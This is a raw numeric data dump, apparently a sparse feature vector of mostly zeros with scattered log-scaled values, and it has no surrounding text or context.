0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 8.520577332514767, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 3.6109179126442243, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 5.723585101952381, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 5.7430031878094825, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.605170185988092, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.605170185988092, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 2.70805020110221, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.276666119016055, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 7.280392111322715, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.302585092994046, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 6.9558749307258045, 0, \n 0.0, 0.0, 0.0, 8.791967689147654, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.367295829986474, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.8066624897703196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.115509720156162, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.367295829986474, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 2.833213344056216, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 7.652696215340966, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 4.160336650881089, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 